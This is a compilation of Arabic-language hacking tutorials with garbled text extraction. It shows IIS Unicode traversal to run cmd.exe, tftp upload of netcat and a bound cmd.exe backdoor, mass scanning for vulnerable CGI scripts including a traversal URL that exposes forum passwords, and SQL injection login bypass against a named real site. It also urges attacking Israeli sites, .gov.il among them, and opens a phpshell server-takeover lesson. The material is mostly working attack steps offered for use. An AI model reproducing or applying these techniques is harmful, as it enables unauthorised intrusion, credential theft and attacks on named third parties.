‫موقع ‪ http://www.netcraft.com /‬‬ ‫بكل بساطه ‪ ,‬نكتب المر ھذا ‪ : nc –v –n 09.1.861.291 08‬‬ ‫الحین طلعنا معلومات عن البورت ‪ 12‬و ‪ , 08‬ولطع لنا ان الموقع شغال على‪ ‬‬ ‫ويندوز ‪ 0002‬وعلى سیرفر‪0.5 IIS .‬و فیه میكورسوفت ‪ FTP‬‬ ‫حلو ھذي معلومات بتفیدنا في تحديد الھدف للختراق‪ .‬‬ ‫الحین بنشتغل شغل اجمد ‪ ,‬وبنبدا فالتطبیق العملي ‪ ,‬بنخترق الموقع‪ .‬‬ ‫بنخلي النت كات يفتح لنا باك دور فالموقع ‪ .‬طبعن لزم نحمل النت كات على‪ ‬‬ ‫الموقع اول شي علشان يفتح لنا الباك دور ‪ .‬كیف ؟؟‪ ‬‬ ‫بما ان الموقع على سیرفر ‪ 0.5 IIS ,‬بنستخدم سكربتات الیونیكود الخطیره في‬ ‫رفعه‪ .‬‬ ‫‪ 973‬‬ ‫مثل ما تشوفون استخدمنا السكربت‪ ‬‬ ‫‪http://192.168.1.90/scripts/..%5c../winnt/system32/cmd.exe?/c+dir+c‬‬ ‫لستعراض محتويات الدرايف ‪ C ,‬عن طريق المجلد‪ Scripts‬‬ ‫وطلعت لنا النتائج ‪ : Documents and Settings , Inetpub , Program Files ,‬‬ ‫‪ WINNT‬‬ ‫حلو ‪ ,‬الحین بنرفع النت كات على سیرفر‪ IIS‬‬ ‫بنستخدم ال ‪ tftp ,‬ھذي الداه مشابھه للف تي بي ‪ ,‬اكتب في الدوس ‪tftp ,‬‬ ‫اذا تبغي تعرف المزيد عنھا‪ .‬‬ ‫نرجع الى موضوعنا‪ :‬‬ ‫‪ 083‬‬ ‫شوفو السكربت الي حطیناه ھ ذي المره ‪ ,‬نفس السكربت الولي ‪ ,‬لكن بدل‪ ‬‬ ‫امر الستعراض ‪ dir ,‬حطینا امر ‪ tftp ,‬وطبقناه ‪ ,‬ھذي ھي طريقه [‪ : TFTP [­i‬‬ ‫‪ ]host [GET | PUT] source [destination‬‬ ‫نحن في اختراقنا ھذا الي سويناه‪ : tftp –I 192.168.1.90 get nc.exe‬‬ ‫طبعن في اسكربتات الیونیكود بدل المسافه نكتب‪ +‬‬ ‫فتصیر بھذا الشكل ‪ http:///c+TFTP+­i+192.168.1.9+GET+nc.exe :‬‬ ‫في برنامج رائع اسمه ‪23 TFTPD ,‬يطلع لك اذا النت كات انرفع بنجاح للسیرفر‬ ‫وصلة البرنامج ‪ :‬‬ ‫‪ http://perso.wanadoo.fr/philippe.jounin/download/tftpd32.272.zip‬‬ ‫موقع البرنامج ‪ http://tftpd32.jounin.net / :‬‬ ‫‪ 183‬‬ ‫الحین بنبدا فالشغل الحلو ‪ ,‬بعد ما رفعنا النت كات وكل شي تمام ‪ ,‬نبغي‪ ‬‬ ‫نخلي النت كات يفتح لنا باك دور‪ (Back Door( .‬‬ ‫علشان نخلیه يفتح لنا الباك دور لزم نخلیه فالول يتنصت على بورت فالسیرفر‬ ‫‪ ,‬مثل اخترت البورت ‪ , 10001‬بعدين بنقدر نتصل بالبورت من جھازنا بستخدام‪ ‬‬ ‫النت كات‪ .‬‬ ‫انزين الحین بنطبق امر التنصت من السیرفر ‪ ,‬ھذا ھو المر‪ : nc ­L ­p 10001 -‬‬ ‫‪ d ­e cmd.exe‬‬ ‫‪ 283‬‬ ‫نشرح شوية الوامر ھذي الي كتبناھا‪ :‬‬ ‫‪Nc :‬يخلي الويندوز يشغل النت كات‪ nc.exe‬‬ ‫‪ ­L :‬يخبر النت كات بان ل يغلق وان ينتظر النتصال‪ ‬‬ ‫‪­p :‬لتحديد البورت الي بنتصنت علیه‪ .‬‬ ‫‪ ­d :‬يخبر النت كات بالتصال بالبرنامج الي نريد ان نشغله‪ ‬‬ ‫‪ ­e :‬يخبر النت كات بالبرنامج الي نريده ان يشتغل بعد التصال بالبورت‪ .‬‬ ‫طبعن نحن اخترنا الدوس‪ cmd.exe‬‬ ‫الحین بنكتب المر في سكربت الیونیكود ‪ ,‬طبعن بیكون بھذا الشكل ‪ :‬‬ ‫‪ http:///c+nc+­L+­p+10001+­d+­e+cmd.exe‬‬ ‫شوفو الصوره‪ :‬‬


‫الحین تمام ‪ ,‬النت كات تنصت على البورت ‪ , 10001‬وفتح لنا باك دور على‪ ‬‬ ‫الدوس‪ cmd.exe‬‬ ‫الحین يا دورنا ‪ ,‬علشان نتصل من جھازنا على النت كات الي على السیرفر‪.‬‬ ‫‪ 383‬‬ ‫الحین مثل ما ملحظین ‪ ,‬بعد ما اتصلنا بالبورت المتنصتین علیه‪ 10001 ,‬‬ ‫بالمر ‪ nc –v –n 09.1.861.291 10001‬‬ ‫دخلنا على ملف ‪ scripts‬الي فالسیرفر ‪ ,‬وطبقنا المر ‪ ipconfig ,‬والنتیجه انه‪ ‬‬ ‫طلع لنا ايبي السیرفر(^_^)‪ ‬‬ ‫الحین تمام صار عندنا تحكم بعید على السیرفر‪ .‬‬ ‫الحین نبغي ننقل الملفات بواسطة النت كات ‪ ,‬كیف ؟؟‪ ‬‬ ‫نقدر عن طريق ال ‪ TFTP ,‬لكن لزم نسويھ ا مره ثانیه عن طريق الیونیكود ‪ ,‬لكن‬ ‫لیش نحن خلص تعاملنا الحین مع النت كات وھو افضل وعندنا اتصال خارجي‪ ‬‬ ‫معاه‪ .‬‬ ‫اول شي امر استقبال او سحب ملف من السیرفر ‪ ,‬مثل اذا كان فالسیرفر ملف‬ ‫اسمه ‪ hack.txt ,‬ونبغي نسحبه ‪ ,‬بنطبق ھذا المر ‪ : nc –l –p 4321‬‬ ‫‪ >hack.txt‬‬ ‫‪4321‬ھذا ھو البورت الي بنستخدمه في سحب الملف‪ .‬‬ ‫‪ 483‬‬ ‫انزين ‪ ,‬واذا حبینا انا نرفع ملف للسیرفر ‪ ,‬كیف ؟؟‪ ‬‬ ‫عن طريق ھذا المر‪ : nc 192.168.1.90 1234 <hack.txt , ^C‬‬ ‫الحین تمام ‪ ,‬نستعرض محتوايات المجلد بالمر ‪ dir ,‬ونتاكد ان كل شي تمام‬ ‫وان الملف انرفع‪ .‬‬ ‫وعلشان نشغل الملف في السیرفر ‪ ,‬نستخدم المر ! ‪ ! , hack.txt‬‬ ‫‪ 583‬‬ ‫مبروك علیك الختراق ‪ ,‬والعملیه تمت بنجاح‪...‬‬ ‫‪ 683‬‬ ‫ماھو الختراق العشوائي‪ ‬‬ ‫للكاتب‪ Kandor:‬‬ ‫ ماھو الـإختراق العشوائي ‪ Random Hacking‬‬‫ تطويره بحیث يصبح يبحث على إستثمارات غییر الـ ‪ CGIScripts‬‬‫ كیف تستغل اي ثغره بعد الحصول علیھا‪ ‬‬‫ ماھو الـإختراق العشوائي ‪ Random Hackingg‬‬‫ھ و البحث في كمیه كبیره من المواقع عن ثغره محدده ‪ ،‬وھذا سھل ويعود‪ ‬‬ ‫بمواقع كثیره جدا جاھزه للختراق ‪ ،‬مثال بسیط جدا ‪ ،‬روح على محرك بحث ‪ ،‬‬ ‫من محركات البحث التي تعتمد على الـ ‪ spiders‬أو العناكب مثل ‪altavista.com‬‬ ‫وأكتب ‪) ، link:xxxx.cgi or pl‬إرجع لشرح زورو في رياضیات البحث) مثل نبحث‪ ‬‬ ‫عن لنك لملف بإسم ‪ link:help.cgi ،help.cgi‬المواقع المردوده لك نتیجه‪ ‬‬ ‫للبحث كلھا تملك منتدى ‪ ، Ikonboard‬إفتح واحد منھا وأبحث في المصدر‪ ‬‬ ‫الكود ‪ HTML‬عن السكربت الذي بحثت عنه ‪ help.cgi‬لتعرف اين مكانه ‪ ،‬لنفرض‬ ‫مكانه ھنا ‪ http://www.example.com/cgi­bin/help.cgi‬‬ ‫أكتب بعد الملف غیر العنوان لیصبح ‪ http://www.example.com/cgi -‬‬ ‫‪ 00%bin/help.cgi?helpon=../members/[member].cgi‬‬ ‫مع ملحظه تغییر [‪ [member‬بإسم عضو وبدون القوسین [] طبعا‪ ‬‬ ‫سوف يعرض لك معلومات العضو كامله ومن ظمنھا كلمة المرور وھذه الثغره لـ‪ ‬‬ ‫المنتدى ‪ Ikonboard 7.1.2‬وھذا لیس لب موضوعي ولكن ھي بدايه ومثال ل‪ ‬‬ ‫تحفظه لني أحضرت أبسط مثال فقط فیوجد غیره مئات بل آلف ملفات الـ‪ ‬‬ ‫‪ CGIScript‬تملك ثغرات مثل ھذه واغلب إستثماراتھا تكون من خلل ‪ url‬‬ ‫للحصول على مثل ھذه الستثمارات لثغرات ملفات السي جي آي سكريبت‪ ‬‬ ‫شوف الرشیف ھذا وھو لغته روسیه أعتقد ولكن ما يھم لننا نبحث عن الـ‪ ‬‬ ‫‪ Exploit‬أو الستثمار‪ ‬‬


‫‪ /http://www.secure.f2s.com/eng_ver/bugs‬‬ ‫وممكن تأخذ إسم المنتج مثل وتضعه في محرك البحث لـ‪ ‬‬ ‫‪ /http://www.securiteam.com‬وتشوف النتائج ‪ ،‬أو تشترك في القائمه البريده‬ ‫لـ سیكیورتي فوكس فھ ي مفیده جدا أنا شاركت من قبل فتره وجدا أعجبت بھا‬ ‫وھ ي مختصه في المن ولیس لـثغرات السي جي آي سكربت ‪ ،‬يعني امن‪ ‬‬ ‫واخبار وكل شئ ‪ ....‬ويوجد برنامج تقدمه سیكیورتي فوكسي بإسم‪ ‬‬ ‫‪ 783‬‬ ‫سیكیورتي فوكس بیجر ‪ ،‬ھو برنامج لتسھیل عملیه الحصول على الخبار‪ ‬‬ ‫ووو‪...‬الخ‪ ‬‬ ‫ تطويره بحیث يصبح يبحث على إستثمارات غییر الـ ‪ CGIScripts‬‬‫الختراق العشوائي إذا كان فعل عشوائي ‪ ،‬يعني تخترق اي موقع ولو بدون‪ ‬‬ ‫سبب فھذه ھ مجیه !! ‪ ،‬لكن ممكن نستفید منه إحنا في أنه ما يكون في‪ ‬‬ ‫شكل ھ مجي ‪ ،‬أنا اقول لك كیف ‪ ،‬مثل إسرائیل اللي الكل يكرھھا ‪ ،‬الذين‪ ‬‬ ‫يأمرون الفلسطینیین بأوقاف إطلق النار ‪ ، ):‬الكل يكرھھم لیس لجل أنھم‪ ‬‬ ‫يھود ‪ ،‬ل نكرھھم لنھم ظلموا فلسطین ‪ ،‬عندھ م موقع فیه آلف من مواقعھم‪ ‬‬ ‫ھذا ھو ‪ sites 01621‬تنتھي بـ ‪ co.il‬و ‪ sites 4011‬تنتھي بـ ‪ org.il‬و ‪ sites 07‬‬ ‫تنتھي بـ ‪ ac.il‬و ‪ .sites 87‬تنتھي بـ ‪ gov.il‬وھذه مھمه ‪ ،‬و ‪ .sites 45‬تنتھي بـ‪ ‬‬ ‫‪ net.il‬و ‪ .sites 92‬تنتھي بـ ‪ muni.il‬و ‪ sites 9002‬تنتھي بـ ‪ ، com‬و ‪.sites 731‬‬ ‫تنتھي بـ ‪ net‬و ‪ .org ­ 121 sites‬و ‪ .edu ­ 4 sites‬لعینه ‪ israel.net - 48 ،‬‬ ‫‪ .sites‬و ‪........ .il ­ sites‬عشان تحصل على كل ھذه السايت روح الموقع ھذا‪ ‬‬ ‫‪ http://iguide.co.il/sites/sites.htm‬‬ ‫وفیه كمان محركات بحث‪ ‬‬ ‫‪ /http://www.achla.co.il‬‬ ‫‪ 1=http://www.reshet.co.il/data/index.vs?dw‬‬ ‫‪ /http://www.maven.co.il‬‬ ‫‪ /http://www.tapuz.co.il‬‬ ‫‪ /http://www.walla.co.il‬‬ ‫‪ http://www.info.gov.il/find.pl‬‬ ‫وفیه محرك أعدم منھا واللي ھو ‪ altavista.co.il‬‬ ‫المھ م على كل شخص منا أن يصلح فرز للبیانات الموجوده في ھذه المواقع ‪ ،‬‬ ‫يستخدم اللغه التي يتقنھ ا لیصنع برنامج يصلح فرز ويضعھا في ملف تكست‪ ‬‬ ‫بدون اشیاء ثانیه معھا‪ ‬‬ ‫‪ 883‬‬ ‫العملیه الثانیه ھي البحث فیھا كلھا عن منتج ‪ ،‬مثل ‪ ، /w3­msql‬الطريقه‪ ‬‬ ‫سھ له جدا ‪ ،‬أول يتم الشبك مع بروكسي مثل ‪ proxy.isp.net.sa :0808‬وثم‪ ‬‬ ‫يرسل له أمر ‪ ، GET‬مثل ترسل للبروكسي‪ ‬‬ ‫‪ 0.1/GET http://www.com.il/cgi­bin/w3­msql/ HTTP‬‬ ‫‪ */* ,Accept: image/gif, image/x­xbitmap, image/jpeg, image/pjpeg‬‬ ‫‪ Accept­Language: ar­sa‬‬ ‫‪ 89 (User­Agent: Mozilla/4.0 (compatible; MSIE 5.5; Windows‬‬ ‫‪ Host: www.com.il‬‬ ‫‪ Proxy­Connection: Keep­Alive‬‬ ‫وھ و يطلب من البروكسي أحضار الموقع ‪ ، /http://www.com.il/cgi­bin‬يتضح‪ ‬‬ ‫طلبنا لـ ‪ ، /cgi­bin/w3­msql‬في الحقیقه ل نبحث عن ثغرات سي جي آي ‪ ،‬‬ ‫ولكن نبحث عن كل المواقع التي يوجد بھا المنتج ‪ ، WWWMSQL‬يعني المواقع‬ ‫السرائلیه مثل التي جمعناھا في ملف تكست كلھا تأخذ واحد واحد وتدخل‪ ‬‬ ‫في البرنامج الذي صممناه وترسل الى البروكسي بحثا عن ‪ cgi­bin/w3­msql‬‬ ‫وثم يحفظ رد البروكسي في ملف خارجي ‪ ،‬وھكذا حتى ننتھي من كل المواقع‬ ‫‪ ،‬وثم نفتح الملف ونشوف التي تم إيجاد المنتج ‪ WWWMSQL‬داخھا والتي لم‪ ‬‬ ‫يوجد ‪ ،‬ونتوجه الى سیكیورتي فوكس وال سیكیورتي تیم وال أي موقع يعجبك‪ ‬‬


‫وابحث عن ‪ ، w3­msql‬مثل في سیكوتي تیم نجد ‪ Exploit‬لـ ‪ w3­msql‬يمكن‪ ‬‬ ‫تطبیقه من المتصفح ‪ ،‬وھو ھنا‪ ‬‬ ‫‪ http://www.securiteam.com/exploits/2WUQBRFS3A.html‬‬ ‫طريقه فحص عده مواقع بحثا عن منتج فیھا أسمیھا انا ‪ Random Hacking‬‬ ‫يعني إختراق عشوائي ‪ ،‬ولكن لو فعل بحثت عن ‪ w3­msql‬في المواقع‪ ‬‬ ‫السرائلیه فأنا أقول لك بأنك ما راح تلقى كثیر أو لن تجد شئ ‪ ،‬ممكن تبحث‪ ‬‬ ‫عن ‪ /vti_pvt_/‬لترصد كل المواقع التي فیھا فرونت بیج ‪ ،‬وطبعا بعد ما يتم‪ ‬‬ ‫حفظ كل المعلومات المسترجعه من البروكسي تكون بشكل ‪ HTML‬عشان كذا‬ ‫أنت خل الملف يكون بنسق *‪ html.‬وافتحه وتجد كل المواقع ‪ ،‬اللي كتب عنھا‪ ‬‬ ‫‪ The page cannot be displayed..‬واللي ‪ Forbddien‬واللي ‪ not found ....‬‬ ‫‪....‬الخ ‪ ،‬من ھ ذه الردود تعرف اللي نت فاوند وال موجود ولكن غیر مسموح‪ ‬‬ ‫بالوصول له ‪..‬الخ بھ ذه الطريقه تعرف اللي موجود علیه واللي مو موجود‪ ‬‬ ‫‪.....‬والباقي علیك‪ ‬‬ ‫‪ 983‬‬ ‫ كیف تستغل اي ثغره بعد الحصول علیھا‪ ‬‬‫إذا كانت ‪ url‬ما يبغا لھا فلسفه ‪ ،‬كود ‪ c‬وما عرفت تشغله أو قابلت فیه أخطاء‪ ‬‬ ‫فممكن تبحث عن فرجون ثاني لـه ولكن بلغه ‪ perl‬أو ‪ Shell *.sh‬وھو الذي‪ ‬‬ ‫يقابل ‪ Batch‬في ويندوز وتحدثنا عنھا في كوكب لغات البرمجه ‪ ،‬من الدوس بعد‬ ‫ما تثبت أكتیف بیرل أكتب ‪ perl exploit.pl‬إذا كان الـ ‪ exploit‬بلغه بیرل ولكن‪ ‬‬ ‫طبعا فیه أشیاء تغییرھا في الكود نفسه ‪ ،‬وھ ذه الشیاء تكون مكتوبه بین‪ ‬‬ ‫علمات التعلیقات ‪ ):‬وأكید بتواجه مشاكل إذا ما تعرف شئ في بیرل ‪ ،‬في‪ ‬‬ ‫ھذه الناحیه ل تطلب شرح بالصور ‪ ):‬إذا رجع لك رد طويل ما قدرت تقراه ممكن‪ ‬‬ ‫تحفظ الخرج عن طريق علمة < وثم مسافه وإسم الملف مثل ‪perl exploit.pl‬‬ ‫‪ > log.htm‬‬ ‫وبالنسبه للمنتج أكتیف بیرل فقط تواجه فیه مشاكل ‪ ،‬لن بعض الـ ‪ Exploit‬‬ ‫كتب في الصدار أربعه وممكن خمسه وممكن ما يعمل زين في أكتايف بیرل‪ ‬‬ ‫لذلك قد تضطر لتغیر المفسر عندك أو تعدل في الكود وھذا كله يطلب خبره في‬ ‫اللغه ‪ ،‬وعلى فكره لیونكس (أعمل على ‪( RedHat 2.6‬فیه مفسر بیرل ممتاز‪ ‬‬ ‫جدا افضل من أكتیف بیرل بعشرات المرات‪ ‬‬ ‫‪ 093‬‬ ‫كیفیة اكتشاف ثغرات الـ‪ SQL Injection‬‬ ‫للكاتب‪ Devil­00:‬‬ ‫الیوم درسنا حلو كثیر ‪ ..‬ونوع من انواع الثغرات المعروفه ‪ .. ..‬و انا احبھا‪ ‬‬ ‫الیوم راح ندخل كمستخدم عادي لبرنامج صغیر ‪ ..‬دون كلمة سر او اسم‪ ‬‬ ‫مستخدم ‪ ..‬ونتعلم الترقیعه لھذا النوع من الثغرات‪ ‬‬ ‫**شكر خاص للماحي ‪ ..‬على المقالت التي ساعدتني كثیر في ھذا الدرس‪ ‬‬ ‫‪ ..‬‬ ‫‪<?php‬‬ ‫‪/*################################‬‬ ‫‪# SQL Injection ­­ Part #‬‬ ‫‪# Coded By : Devil­00 #‬‬ ‫‪# PHP IS More Safe With Me #‬‬ ‫‪# Devil­00@Hotmail.com #‬‬ ‫‪##################################*/‬‬ ‫;))(‪$Connect = mysql_connect('localhost','root','***') or die(mysql_error‬‬ ‫;)'‪$Select = mysql_select_db('mysbb‬‬ ‫‪/*­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­*/‬‬ ‫{))]'‪if (!isset($HTTP_POST_VARS['usernamee‬‬ ‫;)(‪ ShowForm‬‬ ‫{‪}else‬‬


Login(); } /*­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­*/ /*­­­­­­ Function ­­­­­­­*/ function ShowForm(){ echo ' <html> <body> <b>Devil ~ 00 || SQL Injection Part 2</b> <form method="post"> Username :­<br> <input type="text" name="usernamee" size="50" maxlength="30"><br> Password :­<br> <input type="password" name="passwordd" size="50" maxlength="30"><br><br> <input type="submit" name="login" value="Login" size="30"> </form> 391 <b>Security4Arab ­ <a href="http://www.s4a.cc/forum/">http://www.s4a.cc/forum/</a> || MySBB ­ <a href="http://www.mysmartbb.com/forums/">http://www.mysmartbb.com/forums</b> </body> </html> '; } function Login(){ $Query = "SELECT * FROM MySBB_member WHERE username='".$_POST['usernamee']."' AND password='".$_POST['passwordd']."'<br><br><br>"; echo $Query; $SQL_Query = mysql_query("SELECT * FROM MySBB_member WHERE username='".$_POST['usernamee']."' AND password='".$_POST['passwordd']."'") or die(mysql_error()); $NumRows = mysql_num_rows($SQL_Query); if($NumRows != 0){ die("Oky"); }else{ die("Error"); } } /*­­­­­­­­­­­­­­­­­­­­­­*/ ?> : ‫الشرح‬ if (!isset($HTTP_POST_VARS['usernamee'])){ ShowForm(); }else{ Login(); } ‫ھ ذا الكود يقول لو اسم المستخدم غیر موجود تتم علمیة اظھار فورم تسجیل‬ ‫ و ان وجد يتم تسجیل الدخول‬... ‫الدخول‬ ** ‫**دوال كتبتھا بنفسي‬ :­‫الن اخراج الفورم على ھذا الشكل‬


‫>‪<html‬‬ ‫>‪ <body‬‬ ‫>‪ <b>Devil ~ 00 || SQL Injection Part 2</b‬‬ ‫‪ 392‬‬ ‫>"‪ <form method="post‬‬ ‫>‪ Username :­<br‬‬ ‫"‪ <input type="text" name="usernamee" size="50‬‬ ‫>‪maxlength="30"><br‬‬ ‫>‪ Password :­<br‬‬ ‫"‪ <input type="password" name="passwordd" size="50‬‬ ‫>‪maxlength="30"><br><br‬‬ ‫>"‪ <input type="submit" name="login" value="Login" size="30‬‬ ‫>‪ </form‬‬ ‫‪ <b>Security4Arab ­ <a‬‬ ‫­‪href="http://www.s4a.cc/forum/">http://www.s4a.cc/forum/</a> || MySBB ‬‬ ‫‪<a‬‬ ‫‪href="http://www.mysmartbb.com/forums/">http://www.mysmartbb.com/forum‬‬ ‫>‪s</b‬‬ ‫>‪ </body‬‬ ‫>‪</html‬‬ ‫فراغ اسم المستخدم‪ :­ usernamee‬‬ ‫وفراغ كلمة السر‪ :­ passwordd‬‬ ‫والعملیة تتم عن طريق‪ :­ POST‬‬ ‫الن حاول تسجیل دخولك عن طريق اسم مستخدم و اي كلمة مرور ‪ ..‬تظھر‪ ‬‬ ‫رسالة الخطا و يكون الستعلم على ھذا الشكل­‪ :‬‬ ‫‪SELECT * FROM MySBB_member WHERE username='devil' AND‬‬ ‫'‪password='devil‬‬ ‫اوكي لحظنا انه ل يوجد عملیة تشفیر لكلمة السر او اسم المستخدم او اي‪ ‬‬ ‫شيء يمنع كتابة كود سكل‪ :­ ‬‬ ‫والكود السوف نضیفه سوف يسمح لنا بدخول البرنامج دون كلمة مرور ‪ ..‬ويتم‪ ‬‬ ‫التبیق على قاعدة بیانات كلمات المرور ففیھا مشفره بمقیاس‪ MD5 ‬وھي‪ ‬‬ ‫لبرنامج " منتدى العرب‪ " ..‬‬ ‫‪ 393‬‬ ‫الكود السوف نعطیه للحقلن ‪ :‬‬ ‫‪' or 'devil'='devil‬‬ ‫وعند تسجیل الدخول تظھ ر رساله تقول انه تم تسجیل الدخول ‪ ..‬لكن لیس‪ ‬‬ ‫ھذا المھم ھھھھھھھه المھم نعرف كیف ؟‪ ‬‬ ‫يظھر لنا الستعلم على ھذا الشكل‪ ‬‬ ‫‪SELECT * FROM MySBB_member WHERE username='' or 'devil'='devil' AND‬‬ ‫‪'password='' or 'devil'='devil‬‬ ‫شرح الكود ‪ :‬‬ ‫لو اسم المستخدم يساوي اي شي او ديفل = ديفل و الباس ورد تسواي اي‪ ‬‬ ‫شي و ديفل = ديفل ‪ ...‬يتم قبول العملیه‪ ‬‬ ‫ونحن ‪ ..‬قلنا ديفل = ديفل ‪ ...‬يعني انه الشرط تطبق و تم السماح بالدخول‪ ‬‬ ‫اوكي نشرح الكود الي تم استعماله‪ :-‬‬ ‫‪' OR 'devil'='devil‬‬ ‫لقد قمنا باغلق قوس اسم المستخدم و كلمة المرور و اضافة الجمله اور‪ ‬‬ ‫بالستغلل‪ :-‬‬ ‫‪' OR‬‬ ‫‪ 493‬‬


:­‫وھنا اضفنا الشرط الذي تحقق و سمح لنا بالدخول‬ 'devil'='devil ‫ وھكذا‬.. ‫ لنه موجود بالستغلل الرئیسي‬.. ‫لحظ لم يتم اغلق اخر قوس‬ ..‫انتھى الدرس‬ =============== ‫ قم بتشفیر كلمة المرور على‬.. ‫ اغلق الثغره ھ وين جدا‬.. ‫ للمبرمجین‬.. ‫الن‬ md5 ‫اي مقیاس و ھذا مثال على التشفیر بمقیاس الـ‬ <?php /*################################ # SQL Injection ­­ Part2 # # Coded By : Devil­00 # # PHP IS More Safe With Me # # Devil­00@Hotmail.com # ##################################*/ $Connect = mysql_connect('localhost','root','defwebpass') or die(mysql_error()); $Select = mysql_select_db('mysbb'); /*­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­*/ if (!isset($HTTP_POST_VARS['usernamee'])){ ShowForm(); }else{ Login(); } /*­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­*/ /*­­­­­­ Function ­­­­­­­*/ function ShowForm(){ echo ' <html> <body> <b>Devil ~ 00 || SQL Injection Part 2</b> 395 <form method="post"> Username :­<br> <input type="text" name="usernamee" size="50" maxlength="30"><br> Password :­<br> <input type="password" name="passwordd" size="50" maxlength="30"><br><br> <input type="submit" name="login" value="Login" size="30"> </form> <b>Security4Arab ­ <a href="http://www.s4a.cc/forum/">http://www.s4a.cc/forum/</a> || MySBB ­ <a href="http://www.mysmartbb.com/forums/">http://www.mysmartbb.com/forum s</b> </body> </html> '; } function Login(){ $Query = "SELECT * FROM MySBB_member WHERE


username='".$_POST['usernamee']."' AND password='".md5($_POST['passwordd'])."'<br><br><br>"; echo $Query; $SQL_Query = mysql_query("SELECT * FROM MySBB_member WHERE username='".$_POST['usernamee']."' AND password='".md5($_POST['passwordd'])."'") or die(mysql_error()); $NumRows = mysql_num_rows($SQL_Query); if($NumRows != 0){ die("Oky"); }else{ die("Error"); } } /*­­­­­­­­­­­­­­­­­­­­­­*/ ?> =============== 396 : ‫الي فوق ھو الكیفیه وھنا راح اعطیكم مثال وتطبیق عملي علیه‬ : ‫ھذا الموقع مصاب‬ http://radiofann.com/admin/ : ‫الن نذھب الى السورس الخاص بالصفحة نجدھا كالتالي‬ <html> <head> <title>Adminstration for radiofann</title> <meta http­equiv="Content­Type" content="text/html; charset=windows­ 1256"> </head> <body bgcolor="#7C93D0" text="#000000" leftmargin="0" topmargin="0" marginwidth="0" marginheight="0"> <p> </p> <p> </p> <form action="verify_user.php" method=post> <div align="center"> <table width="380" border="0" cellpadding="0" cellspacing="0"> <tr> <td width="13" align="right" valign="top" bgcolor="#D2DCF7"><img src="images/billing_1.gif" width="13" height="13"></td> <td colspan="5" bgcolor="#D2DCF7"> </td> <td width="12" align="right" valign="top" bgcolor="#D2DCF7"><img src="images/billing_3.gif" width="12" height="13"></td> </tr> <tr> <td bgcolor="#D2DCF7"> </td> <td colspan="5" align="center" bgcolor="#D2DCF7"> <table width="333" border="0"cellspacing="0"cellpadding="2"> <tr align="center"> <td colspan="2"> <p><b><font face="Verdana" size="3">Login Page</font></b></p> </td> 397


</tr> <tr> <td width="112"> <div align="center"><font size="2"><b><font face="Arial, Helvetica, sans­serif"> Username</font></b></font></div></td> <td width="213"> <input name="userid" type="text" id="userid" value="" size="20"> </td> </tr> <tr> <td> <div align="center"><font size="2"><b><font face="Arial, Helvetica, sans­serif">Password</font></b></font></div></td> <td> <input name="password" type="password" value="" size="20"> </td> </tr> <tr align="right"> <td colspan="2"><span class="Arial8"><strong> <input name="myaccount" type="checkbox" id="myaccount" value="checkbox" > </strong></span> <font color="#002187" size="1" face="Verdana"><strong> Remember my </strong><b>Username & Password</b></font></td> </tr> <tr align="center"> <td colspan="2"> </td> </tr> <tr align="center"> <td colspan="2"><font face="Verdana" size="2"> </font> <font face="Verdana" size="2"> <input type="submit" name="Submit" value="Submit">      <input type="reset" name="reset" value="Reset"> </font></td> </tr> </table> </td> <td bgcolor="#D2DCF7"> </td> 398 </tr> <tr> <td align="right" valign="bottom" bgcolor="#D2DCF7"><img src="images/billing_2.gif" width="13" height="12"></td> <td colspan="5" bgcolor="#D2DCF7"> </td> <td align="right" valign="bottom" bgcolor="#D2DCF7"><img src="images/billing_4.gif" width="12" height="12"></td> </tr> </table> </div>


‫>‪</form‬‬ ‫>‪</body‬‬ ‫>‪</html‬‬ ‫الن نلحظ شي مھم ھو‪ : ‬‬ ‫"‪<input name="userid" type="text" id="userid‬‬ ‫طلع اسم المستخدم ھو‪ : ‬‬ ‫‪userid‬‬ ‫الن خلاص المھمه صارت بسیطة نضیف ھ ذا الكود في اسم المستخدم وفي‪ ‬‬ ‫مكان الباسورد وراح ندخل‪ % :100 ‬‬ ‫‪' OR 'userid'='userid‬‬ ‫‪ 399‬‬ ‫تعلم(‪ (phpshell‬‬ ‫للكاتب‪ EVIL­MASTER :‬‬ ‫بسم االله الرحمن الرحیم‪ ‬‬ ‫طبعا الكل كان بینتظر الدرس ده بفارغ الصبر لقلة الدروس المشروحة فى ھذا‬ ‫المجال‪ ‬‬ ‫واسف على التاخیر الى كان سببه انى اكون درس كامل وشامل فى ھذا‪ ‬‬ ‫المجال الواسع‪ ‬‬ ‫وانشاء االله ربنا يوفقنى فیه‪ ‬‬ ‫وبشكر مقدما اخوانى واعضاء المجموعة الى ساعدونى فى وضع الشروح‪ ‬‬ ‫­­­­­­­­­­‪ ‬‬ ‫‪ Joun‬‬ ‫‪ Digital­X‬‬ ‫‪ Eng.Islam‬‬ ‫‪ Q8_Risk‬‬ ‫­­­­­­­­­‪ ‬‬ ‫نبداء درسنا طبعا الكل بیسمع عن ‪ phpshell‬لكن مین بیعرفه جیدا او‪ ‬‬ ‫استخدمه من قبل‪ ‬‬ ‫طبعا المبتدئین ما بیعرفو حتى معناه او میزته ‪ .‬‬ ‫الختراق عن طريق ‪ phpshell‬بیعتمد فى الساس على اختراقك لموقع اى‪ ‬‬ ‫موقع على النت‪ ‬‬ ‫وبعدين تحمل علیه ‪ phpshell‬وتبدا فى عملیة السیطرة على السرفر كله اى‪ ‬‬ ‫الشركة‪ ‬‬ ‫المستضیفة للموقع كل المواقع المستضافة علیھ ا بتكون ملكك اذا احسنت‪ ‬‬ ‫استخدام‪ ‬‬ ‫‪phpshell‬وفى الدرس ھ نعلمك اذاى تسفید من الشیل الى اقصى درجة‪ ‬‬ ‫ممكنة‪ .‬‬ ‫انا مش ھتكلم عن رفعك ‪ phpshell‬الحین لكنى ھتكلم عنك كانك رفعته لنى‬ ‫محضر لیكم ھدية‪ ‬‬ ‫فى موضوع الرفع المھ م انت الحین اخترقت موقع عن طريق مثل صغرة فرونت‬ ‫بیج ودخلت على‪ ftp‬‬ ‫وحملت الشل وما تخاف من التحمیل ده مجرد فولدر بتحمله على الموقع‪ ‬‬ ‫‪ 004‬‬ 